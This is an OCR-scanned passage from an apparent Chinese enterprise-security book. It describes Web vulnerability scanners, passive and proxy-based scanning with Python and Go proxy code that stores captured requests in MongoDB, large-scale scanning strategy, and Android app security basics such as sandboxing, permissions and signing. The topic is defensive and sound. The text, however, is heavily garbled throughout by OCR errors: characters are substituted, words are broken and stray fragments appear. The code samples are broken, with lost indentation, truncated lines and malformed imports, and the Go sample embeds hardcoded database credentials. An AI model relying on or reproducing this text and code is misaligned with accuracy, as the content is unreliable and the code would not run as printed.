务 ， 每 天 对 全 部 服务 句 进 行 一 次 安全 扫描 ， 并 将 扫描 结果 入 库 ， 按 漏 酒 
级 别 进行 分 级 。 


2) 程序 自动 建立 工 单 并 提交 到 业务 部 门 进行 修复 ， 修 复 好 后 再 转 
到 安全 部 门 确认 ， 形 成 一 个 民 性 的 闭环 (如 果 你 所 在 的 公司 没有 工 单 系 
统 ， 则 至 少 需 要 建立 一 个 漏洞 管理 系统 代 蔡 )。 


JE: Nessus 官 方 提供 的 REST API 接 口 的 GitHub 地 址 


为 : https://github.com/tenable/nessrest 。 


4.Web 漏 洞 扫描 





业内 第 用 的 web 漏 调 扫 描 工 具 列 表 如 下 : 
-Acunetix Web Vulnerability Scanner (AWVS ) 
-IBM Rational AppScan 

:sqlmap 

*w3af 

-arachni 


‘Zed Attack Proxy 





以 上 几 款 扫描 器 中 ， 前 2 款 是 商业 软件 ， 后 几 款 是 免费 开源 的 。 
实践 方法 如 下 : 


:网 站 较 少 的 公司 。 安 全 工程 师 手 工 用 扫描 器 进行 Web 漏 洞 扫 描 即 
可 ， 但 至 少 要 使 用 2 球 以 上 扫描 器 进行 交叉 确认 ， 避 免 因 茶 款 扫描 器 漏 
报导 致 漏洞 没 扫 到 而 被 外 界 黑 客 利 用 的 情况 发 生 。 一 般 建 议 AWVS 必 
用 ， 再 配合 zap 或 arachni 进 行 确认 。 


网 站 较 多 的 公司 。 大 中 型 的 互联 网 公司 有 成 干 上 万 个 大 大 小 小 的 
网 站 ， 安 全 工程 师 人 肉 利用 扫描 工具 进行 扫描 已 经 不 现实 了 ， 需 要 自 研 
扫描 工具 ， 实 现 上 自动 化 、 批 量化 的 漏洞 扫描 。 和 常见 的 一 个 上 自动 化 web 漏 
洞 扫 揪 颖 的 架构 图 9-2 所 示 。 








自动 化 Web 安全 检测 平台 
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图 9-2 ”自动 化 web 安全 检测 平台 


9.2.2” 按 扫 描 器 行为 分 类 








根据 扫描 器 是 否 主动 发 包 的 行为 ， 可 将 扫描 器 分 为 以 下 几 种 : 
1) 主动 扫描 
2) 半 被 动 扫描 器 
3) PARANA Ti at 
1. 主 动 扫描 


常规 的 扫描 器 都 是 主动 发 包 ， 然 后 根据 返回 的 包 判 断 目 标 设备 是 
存在 漏洞 。 对 于 Web 扫 摘 咒 来 说 ， 是 先 将 URL 息 出 来 ， 然 后 再 在 该 URL 
中 各 个 可 以 输入 参数 的 地 方 测试 注入 、XSS 等 负载 。 常 用 的 AWVS、 
Sqlmap、Nessus 等 都 是 主动 扫描 器 。 


2. 半 被 动 扫描 





其 实 该 类 扫描 器 还 是 属于 主动 扫描 器 ， 区 别 是 UREL 的 获取 途径 不 是 
EE, mÆ FILEN R. 


(1) 通过 Access log 获 取 URL 


例如 将 用 户 或 QA 访问 站 点 的 Access log 去 重 后 进行 扫描 。 


(2) 通过 流量 镜像 的 方式 获取 URL 


通过 旁 路 镜像 得 到 全 流量 URL， 去 重 后 进行 扫描 。 对 于 比较 大 规模 
的 Web 资 源 扫描 ， 可 以 通过 Storm 流 式 计算 平台 将 来 自分 光 的 全 流量 
URL 库 rewrite 奉 换 ， 去 重 归 一 ， 验 证 真实 性 后 作为 扫描 器 的 输入 源 ， 由 
消息 队列 推送 至 分 布 式 扫描 器 中 。 以 下 为 一 个 利用 WAF log, MERHER 
及 流量 镜像 中 的 URL 作 为 输入 源 的 扫描 器 的 架构 如 图 9-3 所 示 。 





(3) HTTP 代 理 式 的 扫描 器 

这 种 方式 常 被 QA 或 渗透 测试 人 员 使 用 ， 在 浏览 器 设置 一 个 代理 ， 
然后 去 访问 网 站 的 页 面 ， 每 访问 一 个 URL 就 会 被 放 到 后 台 去 扫描 ， 基 本 
的 框架 代码 如 下 : 








去 重合 并 归 一 


» ED 




















图 9-3 ”URL 库 作为 扫描 器 输入 源 





class ProxyHandler (tornado.web.RequestHandler): 
SUPPORTED_METHODS = ['GET', 'POST', 'CONNECT'] 


@tornado.web.asynchronous 
def get(self): 
url_info = dict( 
method=self.request.method, 


url=self.request.uri 


self.request_info = None 


def handle_response 


(response): 
if (response.error and not 
isinstance(response.error, tornado.httpclient.HTTPError)): 
self.set_status(500) 
self.write('Internal server error:\n' + str(response.error) ) 
else: 
self.set_status(response.code) 
for header in ('Date', 'Cache-Control', 'Server','Content-Type', 'Lc 
v = response.headers.get(header ) 
if v: 
self.set_header(header, v) 
v = response.headers.get_list('Set-Cookie' ) 
if v: 
for i inv: 
self.add_header('Set-Cookie', i) 
if response.body: 
self .write(response. body) 
# Insert http request and response into mongodb 
if self.application.scan: 
url = url_info.get('url') 
url_filter = UrlFilter (url) 
if url_filter.filter(): 
http_info = HttpInfo(url_info, self.request_info, response) 
values = http_info.get_info() 
mongodb = Mongodb(db_info) 
mongodb. insert(values ) 
self.finish() 
body = self.request.body 
self.request_info = self.request 
if not body: 
body = None 
try: 
fetch_request( 
self.request.uri, handle_response, 
method=self.request.method, body=body, 


headers=self.request.headers, follow_redirects=False, 


allow_nonstandard_methods=True) 


except tornado.httpclient.HTTPError as e: 


if hasattr(e, 'response') and e.response: 
handle_response(e.response) 

else: 
self.set_status(500) 
self.write('Internal server error:\n' + str(e)) 
self.finish() 





完整 的 demo 代 码 请 参考 : https://github.com/netxfly/passive_scan o 
(4) vpn 式 的 扫描 器 


与 前 一 种 类 似 ， 不 过 该 种 扫描 需要 播 入 一 个 特定 的 VPN 中 ， 在 vpn 
服务 器 中 会 设置 一 个 透明 代理 ， 将 80 和 443 端 口 的 数据 转发 到 透明 代理 
中 ， 之 后 测试 者 每 访问 一 个 URL 也 会 放 到 后 台 去 扫描， 以 下 的 golang 代 
码 就 实现 了 一 个 透明 代理 : 





package main 
import ( 
"flag" 
"Fmt" 
"github.com/netxfly/Transparent -Proxy -Scanner/hyperfox/proxy" 
"github.com/netxfly/Transparent -Proxy-Scanner/hyperfox/tools/capture" 
"strings" 
// “github.com/netxfly/Transparent -Proxy-Scanner/hyperfox/tools/logger" 
"github.com/toolkits/slice" 
"log W 
"net/http" 
"net/url" 
"os" 
W time" 
"upper.io/db" 
"upper .i0/db/mongo" 
) 
const version = "0.9" 
const ( 


defaultAddress = ~0.0.0.0° 
defaultPort = uint(3129) 
defaultSSLPort = uint(3128) 
) 
const ( 
Host = "127.0.0.1" 
Port = "27017" 
User = "xsec" 
Password = "x@xsec.io" 
Database = "passive_scan" 


var 


var 


settings = mongo.ConnectionURLf{ 

Address: db.Host(Host), // MongoDB hostname. 

Database: Database, // Database name. 

User: User, // Optional user name. 

Password: Password, // Optional user password. 

( 

flagAddress = flag.String("1", defaultAddress, "Bind address.") 

flagPort = flag.Uint("p", defaultPort, "Port to bind to, default is 3129' 

flagSSLPort = flag.Uint("s", defaultSSLPort, "Port to bind to (SSL mode), 
default is 3128.") 

flagSSLCertFile = flag.String("c", "", "Path to root CA certificate.") 

flagSSLKeyFile = flag.String("k", "", "Path to root CA key.") 

( 


sess db.Database 
col db.Collection 


( 


static_resource []string = []string{"js", "css", "jpg", "gif", "png", "exe", 


"Zip", "rar", "ico", 


"gz", "7z"; "tgz", "bmp", "pdf", "avi", "mp3", "mp4", "htm", "html", "shtml' 


// dbsetup sets up the database. 
func dbsetup() error { 


} 


var err error 
// Attemping to establish a connection to the database. 
sess, err = db.Open(mongo.Adapter, settings) 
fmt .Printin(sess) 
if err != nil { 

log.Fatalf("db.Open(): %q\n", err) 
} 


// Pointing to the "http_info" table. 
col, err = sess.Collection("http_info") 
return nil 


// filter function 
func filter(content_type string, raw_url string) bool { 


ret := false 
if strings.Contains(content_type, "text/plain") || strings.Contains 
(content_type, "application/x-gzip") { 
url_parsed, _ := url.Parse(raw_url) 
path := url_parsed.Path 
t := strings.Split(path[1:], ".") 
suffix := t[len(t)-1] 
if !slice.ContainsString(static_resource, suffix) { 
ret = true 
} 
} 


return ret 


} 
// Parses flags and initializes Hyperfox tool. 
func main() { 
var err error 
var sslEnabled bool 
// Parsing command line flags. 
flag.Parse() 
// Opening database. 
if err = dbsetup(); err != nil { 
log.Fatalf("db: %q", err) 
} 


// Remember to close the database session. 

defer sess.Close() 

// Is SSL enabled? 

if *flagSSLPort > 0 && *flagSSLCertFile != "" { 
sslEnabled = true 

} 


// User requested SSL mode. 
if sslEnabled { 
if *flagSSLCertFile == "" { 
flag.Usage() 
log.Fatal(ErrMissingSSLCert ) 


} 
if *flagSSLKeyFile == "" { 
flag.Usage() 
log.Fatal(ErrMissingSSLKey ) 
} 
os.Setenv(proxy.EnvSSLCert, *flagSSLCertFile) 
os.Setenv(proxy.EnvSSLKey, *flagSSLKeyFile) 


// Creatig proxy. 
p := proxy.NewProxy() 
// Attaching logger. 
// p.AddLogger (logger .Stdout {}) 
// Attaching capture tool. 
res := make(chan capture.Response, 256) 
p.AddBodyWriteCloser(capture.New(res) ) 
// Saving captured data with a goroutine. 
go func() { 
for { 
select { 
case r := <-res: 
if filter(r.ContentType, r.URL) { 
// fmt.Println(r.Method, r.URL, r.ContentType) 
if _, err := col.Append(r); err != nil { 
log.Printf(ErrDatabaseError.Error(), err) 
} 


} 
}() 
cerr := make(chan error) 
// Starting proxy servers. 
go func() { 


if err := p.Start(fmt.Sprintf("%s:%d", *flagAddress, *flagPort)); err != nil 


cerr <- err 


} 
}() 
if sslEnabled { 


go func() { 
if err := p.StartTLS(fmt.Sprintf("%s:%d", *flagAddress, 


*flagSSLPort)); 


cerr <- err 
} 
}() 
} 
err = <-cerr 
log.Fatalf(ErrBindFailed.Error(), err) 





完整 的 实现 代码 请 参考 


GitHub: https://github.com/netxfly/Transparent-Proxy-Scanner 。 


3. 全 被 动 扫描 


部 署 方 式 上 类 似 于 IDS， 不 主动 息 URL， 而 是 对 B/S & C/S 双 向 交互 
的 数据 流 进行 扫描 以 期 发 现 漏 洞 ， 全 被 动 扫 描 的 特点 如 下 : 





1) 不 需要 联网 ， 不 会 主动 肘 取 URL， 不 会 主动 发 出 任何 数据 包 。 





2) 更 关注 漏洞 感知 ， 而 不 是 入 侵 行为 。 





何 时 需要 被 动 扫 描 ? 在 日 第 的 安全 管理 中 ， 经 常 有 一 些 业 务 部 门 会 
引发 安全 管理 之 痛 ， 例 如 : 

:业务 部 门 没有 经 过 安全 部 门 的 安全 扫描 和 评估 就 擅 目 上 线 ， 线 宋 
上 线 的 服务 右 或 站 点 被 入 侵 了 。 





业务 上 线 时 确实 经 过 安全 扫描 和 评审 环节 ， 当 时 证 明 是 安全 的 ， 
但 在 业务 运营 的 过 程 中 ， 经 过 几 次 更 新 ， 把 安全 漏洞 更 新 到 生产 环境 中 
Ta 


-部 分 业务 因 人 员 更 换 或 离职 变 成 了 无 人 管理 的 业务 ， 也 有 可 能 次 
产 不 在 公司 的 资产 列表 中 ， 因 长 期 无 人 维护 被 攻击 者 外 了 空子 。 





有 了 被 动 式 扫描 器 后 ， 可 以 对 这 些 处 于 灰色 地 带 的 资产 进行 防护 。 


9.3 ”如何 应对 大 规模 的 资产 扫 摘 








近年 来 云 计 算 和 大 数据 很 火 ， 不 少 广 商 的 安全 部 门 也 纷纷 引入 了 大 
数据 及 分 布 式 运算 ， 比 如 安全 日 志 分 析 、 通 过 大 数据 反扑 虫 、 用 流量 镜 
像 中 的 URL 进 行 Web 扫 撒 、 分 布 式 扫描 融 等 。 普 通 的 扫描 方式 在 数 万 或 
几 十 万 人 台 服 务 器 的 环境 下 会 遇 到 以 下 问题 : 








D 单 台 或 数 人 台 扫 描 怖 仍 不 足以 上 覆盖 海量 IDC， 完 成 全 网 扫描 需要 
很 多 资源 。 





2) 大 量 的 并 发 扫描 占用 网 络 带宽 ， 高 峰 时 影响 用 尸体 验 ， 执 行 深 
度 检测 可 能 会 使 应 用 或 服务 直接 宕 挥 。 


3) 大 量 的 误 报 以 及 中 低 风 险 漏洞 会 使 人 工 解读 和 后 续 整 理 难 上 加 
难 。 





因此 海量 IDC 规 模 下 漏洞 扫描 需要 寻求 高 效 的 方式 ， 总 体 思 路 是 减 
少 工作 量 ， 有 几 个 方法 : 





1) 简化 漏洞 评估 链 ， 减 少 需要 扫描 的 任务 。 


2) 减少 漏洞 扫描 的 网 络 开销 和 被 检查 者 的 性 能 损耗 。 


3) 减少 漏洞 扫描 的 种 类 。 


4) 减少 手工 确认 的 工作 量 。 





在 实践 中 ， 需 要 从 以 下 几 方 面 进行 优化 : 


1) 不 做 全 网 的 漏洞 扫描 ， 先 做 端口 扫描 ， 这 样 做 的 前 提 是 访问 控 
制 和 纵深 防御 做 到 位 ， 利 用 ACL 大 幅 减少 攻击 面 ， 把 需要 漏洞 扫描 的 端 
口 减少 到 22、80、443 等 ， 开 的 端口 少 了 ， 全 网 全 协议 漏洞 扫描 就 缩减 
为 全 网 几 个 关键 应 用 的 扫描 。 





2) 做 好 高 危 奖 口 监控 ， 防 止 * 计 划 外 ”应 用 的 泪 用 ， 这 样 漏洞 扫描 
这 件 事 就 瘦身 为 端口 监控 加 关键 应 用 扫描 。 


3) 在 系统 和 应 用 扫描 上 ， 不 完全 依赖 于 网 络 扫 描 器 ， 可 同时 借助 
于 本 机 agent 扫 描 ， 类 似 心脏 滴 血 的 漏洞 与 其 从 网 络 上 去 获取 扫 漏 洞 ， 不 
如 在 本 地 获取 OpenSSL 的 版 本 更 简单 。 服 务 器 OS 本 地 的 agent 除 了 可 以 
扫 系 统 型 漏洞 ， 还 可 以 扫 本 地 配置 型 漏洞 ， 相 对 来 说 本 地 获取 的 信息 比 
网 络 获取 更 准确 ， 但 代价 是 会 消耗 服务 器 资源 ， 所 以 这 块 需要 尽 可 能 地 
减少 性 能 损耗 。 


除了 极 个 别 大 公司 ， 对 于 绝 大 多 数 企 业 而 言 ， 目 研 扫描 露 比 商业 产 
品 或 成 熟 的 开源 产品 扫描 能 力 更 强 的 可 能 性 是 不 高 的 ， 但 是 单机 扫描 又 
严重 影响 效率 ， 所 以 对 于 业务 有 一 定 规模 但 安全 团队 义 没 能 力 目 制 扫描 
器 的 公司 ， 可 以 考虑 将 现 有 的 扫描 喜 改 成 分 布 式 的 ， 如 下 所 示 : 














.对 于 Web 漏 洞 扫 描 ， 可 以 通过 任务 队列 的 方式 将 扫描 任务 发 给 
awvs、arachni、w3af 等 扫描 嚣 ， 改 成 分 布 式 扫描 器 。 


.对 于 服务 器 及 网 络 漏洞 扫描 ， 可 以 多 部 普 几 台 Nessus 扫 描 器 ， 并 配 
置 为 集群 模式 ， 调 用 API 进 行 大 规模 扫描 。 


在 攻防 愈演愈烈 的 现代 ， 光 有 基于 静态 漏洞 规则 和 带 fazz 功 能 的 扫 
是 会 有 许多 漏洞 履 冀 不 到 ， 安 全 部 门 需要 采取 基于 数据 的 扫描 ， 比 
合 社工 库 等 。 其 次 需要 建立 应 急 啊 应 中 心 ， 让 广大 白 帽 子 也 参与 到 
漏 调 的 挖掘 与 发 现 中 ， 尽 可 能 多 地 把 暴露 在 外 面 的 漏 调 消 灭 掉 。 








描 还 





还 
如 结 











大 型 互联 网 公司 在 安全 实践 上 可 能 采取 一 些 精 简 手 段 ， 只 做 某 些 事 
情 ， 前 提 是 他 们 已 经 做 了 另外 一 些 看 不 见 的 防御 措施 ， 在 茶 处 精简 必然 
古 因 为 在 其 他 地 方 削减 了 攻击 面 ， 并 且 有 多 层次 的 防御 机 制 做 互补 ， 也 
就 是 次 他 们 的 方案 往往 是 针对 目 身 特点 的 ， 不 是 一 个 完全 意义 上 的 通用 
方案 ， 如 果 我 们 的 安全 建设 尚未 到 达 那 个 阶段 ， 直 接 和 安全 走 在 前 沿 的 
大 型 互联 网 公司 看 齐 ， 采 用 人 家 “高 大 上 ”的 安全 解决 方案 时 ， 很 有 可 能 
会 发 生 刻 髓 求 剑 的 笑话 ， 需 要 实事 求 是 ， 根 据 实际 情况 逐步 地 建设 押 在 
机 构 的 安全 体系 。 
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第 10 草 ”移动 应 用 安全 


互联 网 公司 的 安全 体系 基本 上 以 运 维 安全 ， 应 用 安全 ， 业 务 安全 三 
管 齐 下 。 而 移动 应 用 安全 则 在 应 用 安全 中 占据 半壁 江山 ， 尤 其 对 于 移动 
端 产品 为 主 的 公司 而 言 ，SDL 的 主要 实践 对 象 就 是 移动 应 用 。 











10.1 背景 


随 看 智能 手机 和 其 他 移动 设备 的 爆发 式 普 及 ， 移 动 应 用 已 成 为 互联 
网 公司 业务 重要 的 业务 方向 。 本 章 中 会 以 移动 两 大 平台 之 一 的 安 早 为 主 
线 ， 介 绍 移动 应 用 所 面临 的 安全 风险 和 解决 方案 。 其 中 包含 评估 方法 以 
及 应 对 的 思路 ， 这 些 思路 可 以 相应 的 借鉴 于 其 他 平台 上 。 本 章 的 内 容 包 
括 定义 客户 端 应 用 安全 的 范围 是 什么 ， 风 险 有 哪些 ， 攻 击 的 来 源 ， 移 动 
操作 系统 所 提供 的 工具 。 在 了 解 这 些 基 本 的 判断 之 后 ， 当 一 些 新 的 技术 
出 现 ， 我 们 仍然 可 以 用 已 有 的 标准 去 应 对 。 











10.2 ”业务 架构 分 析 


移动 应 用 很 少 会 单独 存在 ， 多 数 情况 下 会 作为 互联 网 业务 流程 中 的 
承载 平台 出 现 。 如 果 业 务 同 时 存在 传统 Web 页 面 服务 模式 ， 两 者 从 人 逻辑 
上 处 于 并 行 的 关系 ， 只 是 不 同 的 表现 形式 。 作 为 一 种 运行 在 用 户 控制 设 
备 上 的 应 用 ， 业 务 服 务 端 应 该 假设 客户 端 提交 的 信息 存在 各 种 可 能 ， 在 
设计 时 需要 关注 哪些 逻辑 适合 放 在 移动 端 ， 哪 些 逻 辑 需 要 保留 在 服务 

涉及 业务 核心 数据 的 行为 ， 例 如 游戏 中 的 物品 掉 落 ， 文 付 行 为 的 判 
盯 ， 账 号 信息 的 更 改 等 都 需要 在 业务 服务 端 进行 判断 ， 而 非 客 户 端 。 这 
些 分 割 需要 从 设计 阶段 对 移动 客户 端 能 做 哪些 行为 进行 限定 。 








从 整体 业务 角度 来 看 ， 业 务 人 逻辑 为 皮 ， 移 动 应 用 端的 展示 为 毛 。 如 
何 避 免 移动 客户 端 做 不 应 承担 的 判断 ， 如 何 将 应 用 安全 和 业务 服务 疹 逻 
辑 进 行 划 定 是 首先 需要 明确 的 。 


10.3 ”移动 操作 系统 安全 简 人 


图 10-1 是 安 卓 系统 的 架构 。 和 安全 相关 的 介绍 可 以 参 
看 https://source.android.com/security/index.html ， 其 中 : 













ALARM - BROWSER + CALCLILATOR + 
CALENDAR » CAMERA + CLOCK « CONTACTS « 
DIALER + EMAIL + HOME + A + MEDIA PLAYER 
t PHOTO ALBUM + SMS/MMS < VOISE DIAL 
CONTENT PROVIDERS + MANAGERS 

fACT ITY, LOCATION, PACKAGE, 
ROTIFIOATICN, RESOURCE, TELEPHONY, 
WIND DW) + VIEW SYSTEM 


ALUO MANAGER + 
FREETYPE + LISE + 
MEDIA FRAMEWORK + CORE LIBRARIES * 
OPENGSLZZS + ART + DALVIK Vid 


SOLTE + SSL + 
SUREACE MANAGER - 

MEW AUDIO- BLUETOOTH - CAMERA - DR 了 
- EXTERNAL STORAGE + GRAPHICS + 
INPLT = MEDIA « SENSORS + TY 


DRIVERS (AUDIO, SINDER {PC} 
BLUEFGOTH, CAMERA, DISPLAY, 
KEYPAD, SHARED MEMORY, USB, 
WIFE - POWER MANAGEMENT 


图 10-1 Android 体 系 架 构 


. 便 件 设备 : 安里 可 运行 在 范围 广泛 的 硬件 上 上， 并且 文 持 某 些 便 件 
特有 的 安全 功能 ， 例 如 ARM v6 的 eXecute-Never 功 能 。 


RARE RS: 底层 为 Linux 内 核 ， 所 有 设备 资源 都 通过 该 层 提 


供 ， 包 括 相 机 ，GPS 数 据 、 蓝 牙 、 电 话 、 网 络 等 服务 。 


. 安 卓 应 用 : 通常 使 用 Java 开 发 ， 运 行 在 Dalvik/ART 虚 拟 机 中 ， 除 此 
之 外 还 包括 一 些 二 进 制 的 组 件 。 应 用 中 不 论 是 虚拟 机 还 是 二 进 制 的 部 分 
都 在 相同 的 安全 域 ， 也 就 是 该 应 用 的 沙 盒 中 。 


现代 移动 操作 系统 和 早期 操作 系统 相 比 有 一 定 的 优势 ， 以 Windows 
为 例 ， 在 不 断 更 新 的 过 程 中 ， 会 被 过 去 的 理念 和 代码 实现 所 拖累 。 而 安 
卓 和 iOS 作 为 之 后 设计 开发 的 操作 系统 ， 在 设计 上 加 入 了 一 些 新 的 理 
念 。 此 外 现代 操作 系统 如 安 卓 中 包含 了 大 量 的 漏洞 利用 绥 解 技术 ， 例 如 
ASLR，SELinux，FORTIFY_SOURCE 编 译 选项 等 技术 。 这 些 技术 能 i 
一 步 提高 利用 漏洞 的 难度 ， 降 低 漏 洞 利用 成 功率 。 








以 安 日 为 例 ， 可 以 在 下 面 的 连接 中 看 到 安 音 在 5.0 和 6.0 大 版 本 中 系 
统 对 应 的 安全 升级 项 。 


https://source.android.com/security/enhancements/enhancements50.html 
https://source.android.com/security/enhancements/enhancements60.html 


由 于 这 些 措施 的 运用 ， 在 未 越狱 或 root 的 设备 上 ， 更 多 的 需要 考虑 
应 用 目 身 遇 到 的 安全 问题 。 应 用 需要 信任 并 借用 底层 系统 提供 功能 。 


安 时 在 设计 时 已 经 考虑 并 集成 了 很 多 安全 相关 的 功能 和 组 件 ， 一 球 
普通 的 应 用 在 设计 和 开发 过 程 中 都 可 能 用 到 这 些 。 先 来 了 解 下 一 球 安 全 


应 用 的 大 体 的 结构 。 


Google 提 供 了 专门 的 Security Tips 给 开发 人 员 参 考 ， 可 以 参见 下 面 
的 连接 : 


http://developer.android.com/training/articles/security-tips.html 


其 中 的 内 容 包 括 : 数据 安全 性 ， 服 务 安全 性 ， 应 用 权限 安全 性 ， 以 


及 其 他 一 些 内 容 。 


10.4 签名 管理 





为 了 确定 应 用 的 来 源 ， 无 论 安 早 还 是 iOS 都 会 对 应 用 的 签名 进行 检 
查 ， 确 保 用 户 安 装 的 应 用 来 源 可 控 。 在 来 源 检查 上 iOS 环 境 下 更 加 可 控 
一 些 ， 造 成 这 种 情况 的 原因 很 多 ， 但 最 重要 的 一 点 是 对 应 用 市 场 的 控制 
力 。 对 于 应 用 开发 方 ， 应 该 保护 好 本 公司 用 于 应 用 签名 的 私 铀 ， 推 荐 的 
解决 方 采 是 建立 签名 服务 器 ， 开 发 者 上 传 需 要 签名 的 应 用 ， 服 务 器 完成 
签名 后 提供 下 载 。 签 名 服务 可 对 申请 应 用 签名 的 人 员 进 行 权 限 控制 ， 并 
包含 日 志 记 录 ， 保 存 上 传 应 用 副本 等 功能 ， 这 样 做 的 好 处 是 降低 私 钥 泄 
露 的 风险 。 














另外 一 点 和 签名 相关 的 注意 项 是 ， 在 同一 家 公司 内 的 应 用 推荐 使 用 
相同 的 签名 密 铀 ， 避 免 不 同 的 应 用 使 用 不 同 的 签名 ， 这 样 不 仅 便于 之 后 
的 发 布 和 管理 ， 在 技术 也 便于 之 后 可 能 存在 的 应 用 间 通 信 需 求 。 无 论 
iOS 中 的 Keychain Access Group 和 安 卓 权限 定义 中 要 求 的 同 签名 来 源 
Gevel=Signature) 都 要 求 应 用 被 相同 的 密 钥 签 名 。 








10.5 ”应 用 沙 盒 及 权限 


如 之 前 所 说 ， 安 时 和 iOS 作 为 之 后 设计 开发 的 操作 系统 ， 在 设计 上 
加 入 了 一 些 新 的 理念 ， 其 中 重要 的 一 点 是 通过 沙 盒 (Sandbox) 对 各 应 
用 间 的 权限 隔离 ， 并 在 限定 应 用 行为 边界 后 ， 通 过 按 需 申请 应 用 权限 的 
方式 规范 各 应 用 的 行为 。 这 样 束 将 单个 应 用 面临 的 风险 和 其 他 应 用 以 及 
操作 系统 相隔 离 。 








在 安 盾 系统 上 ， 在 接触 任何 系统 资源 前 ， 应 用 都 要 通过 权限 检查 ， 
如 图 10-2 所 示 。 


Android 操作 系统 权限 检查 





PER 
图 10-2 ”应 用 权限 检查 


那么 是 如 何 实 现 沙 盒 的 ? 安 卓 和 iOS 内 核 都 源 自 *nix 类 系统 内 核 ， 
对 应 用 沙 盒 的 技术 实现 都 是 基于 操作 系统 提供 的 用 户 机 制 。 每 个 在 系统 


上 安装 的 应 用 ， 如 果 没 有 特殊 设 定 SYSTEM 或 者 安 卓 中 SHARED-UID 
模式 ) ， 都 会 有 系统 分 配给 应 用 一 个 独特 的 用 户 ID CUID) ， 单 赁 该 
UID， 应 用 无 法 使 用 任何 应 用 外 的 设备 资源 。 只 有 当 应 用 在 安装 时 预先 
申请 了 某 些 系统 权限 后 ， 才 会 被 准许 进行 权限 对 应 的 操作 。 





以 安 章 系统 为 例 ， 申 请 系统 权限 需要 按照 如 下 格式 在 应 用 的 
AndroidManifest.xml 文 件 中 添加 uses-permission 的 标签 段 。 





<uses-permission android:name="string"android:maxSdkVersion="integer" /> 





其 中 android: name 属 性 就 是 将 要 申请 的 权限 名 称 ， 安 日 所 提供 的 
所 有 权限 定义 的 名 称 和 说 明 可 以 在 下 面 的 连接 中 碍 


看 : https://developer.android.com/reference/android/Manifest.permission.htn 


此 外 ， 应 用 在 申请 系统 提供 的 权限 的 同时 ， 也 可 以 声明 创建 新 的 自 
定义 权限 ， 并 且 和 应 用 内 提供 的 一 些 模块 相关 联 。 在 下 面 的 实例 中 ， 应 
用 自 定 义 了 名 为 com.example.projectDEBIT_ACCT 的 权限 ， 并 且 和 
com.example.project.FreneticActivity 模 块 关联 ， 之 后 如 果 其 他 应 用 需要 调 
用 该 模块 ， 就 需要 在 自己 的 AndroidManifest.xml 文 件 中 声明 使 用 
com.example.project.DEBIT_ACCT: 





<manifest . . .> 
<permission android:name="com.example.project.DEBIT_ACCT" . . . /> 
<uses-permission android:name="com.example.project.DEBIT_ACCT" /> 


<application . . .> 
<activity android:name="com.example.project.FreneticActivity" 
android: permission="com.example.project.DEBIT_ACCT" 
.> 


</activity> 
</application> 
</manifest> 





从 上 面 的 描述 可 以 了 解 到 ， 应 用 既 可 以 作为 权限 的 申请 方 ， 也 可 以 
提供 自 定义 权限 供 其 他 应 用 使 用 ， 而 这 些 自 定义 权限 相配 合 的 是 背后 各 
种 组 件 。 





10.6 ”应 用 安全 风险 分 析 





在 应 用 和 业务 逻辑 已 经 剥离 的 情况 下 ， 仍 然 可 能 存在 严重 的 安全 风 
险 。 痛 先 需 要 意识 到 这 些 风 险 的 根源 十 应 用 实现 形态 的 多 样 性 。 在 提倡 
模块 化 的 今天 ， 应 用 在 实现 过 程 中 会 分 为 数量 众多 的 模块 来 实现 ， 这 些 
模块 相互 看 合 ， 疝 模块 外 提供 调用 接口 ， 或 主动 或 被 动 的 接收 外 部 数据 
并 影响 内 部 逻辑 。 通 过 梳理 这 些 接口 和 数据 来 源 ， 可 以 获取 到 安全 风险 
的 来 源 列表 。 











这 些 调用 接口 的 形式 是 多 样 的 ， 应 用 既 可 以 在 同系 统 下 的 组 件 层 面 
提供 各 种 服务 ， 也 可 能 开放 网 络 端 口 接受 数据 请 求 。 此 外 客户 并 应 用 还 
更 多 的 涉及 文件 内 容 的 展示 ; RAIN, Bo, SC, Al, Bek 
等 公有 和 目 定 义 文件 类 型 的 展示 ， 网 页 内 容 展示 也 给 移动 端 应 用 带 来 了 
风险 。 在 处 理 外 部 的 数据 过 程 中 ， 会 影响 应 用 内 部 的 逻辑 。 除 了 传统 的 
数据 来 源 ， 由 于 现代 操作 系统 已 经 进行 了 应 用 间 的 权限 隔离 ， 如 何 避 免 
同系 统 中 其 他 应 用 禄 取 特 定 的 权限 也 是 需要 关注 方 面 。 下 面 是 一 些 具体 
的 风险 列表 : 

















:应 用 间 通 信 GPC) : 提供 接口 的 组 件 权 限 ， 信 息 泄露 ， 本 地 的 数 
据 加 密 和 文件 权限 等 ， 以 安 半 为 例 ，IPC 接 口 包 括 Content Provider, 


Broadcast Receiver，Activity，Service 等 形式 。 


远程 数据 : 开放 端口 接收 数据 ， 接 收 的 各 类 型 文件 ， 应 用 的 目 动 
升级 ， 数 据 传 输 明文 等 


两 类 目标 : AP: 内 容 伪造 ， 导 致 不 能 正确 判断 ， 程 序 : 代码 实现 
上 的 漏洞 ， 代 码 执 行 ， 权 限 窃取 和 绕 过 。 从 严重 程度 来 看 ， 首 先 需 要 注 
意 远程 来 源 数 据 。 








10.7 ”安全 应 对 





对 于 大 多 数 应 用 来 说 ， 都 会 使 用 到 目 身 代码 之 外 的 三 方 逻 辑 ， 这 些 
逻辑 可 能 存在 于 调用 库 中 或 作为 独立 组 件 个 使 用 ， 这 些 逻 辑 可 能 引入 安 
全 问题 。 对 于 三 方 的 选择 ， 建 议 选 取保 持 更 新 的 开源 项 目 ， 得 看 项 目 升 
级 日 志 中 修补 过 的 安全 列表 ， 确 认 应 用 中 将 要 使 用 的 版 本 是 舍 已 经 修补 
己 知 安全 问题 ， 并 订阅 此 项 目的 版 本 更 新 邮件 ， 能 在 之 后 发 布 安全 更 新 
时 第 一 时 间 评 估 影 响 。 








具体 到 自 映 代码 的 引入 的 问题 ， 需 要 符合 最 小 化 原则 。 举 例 来 说 ， 

对 只 需要 应 用 自 映 使 用 到 的 组 件 ， 不 提供 给 其 他 应 用 ;， 对 于 不 需要 开放 
的 症 口 ， 限 定 监听 在 特定 的 IP; 对 于 本 地 保存 的 数据 库 或 文件 等 ， 严 格 
的 限定 读 写 权限 等 。 除 此 之 外 ， 另 外 两 方面 就 是 在 需要 时 提供 完善 的 认 
证 和 加 密 机 制 。 以 近期 的 wormHole 系 列 漏 洞 为 例 ， 利 用 的 风险 来 源 是 
开放 的 端口 ， 而 这 些 端口 在 移动 网 络 上 的 访问 没有 任何 限制 ， 并 且 在 进 
行 高 危 逻 辑 前 没有 做 好 认证 ， 这 束 是 最 小 化 原则 和 认证 机 制 的 一 个 反 

例 。 














10.8 ”安全 评估 


1 代码 审计 


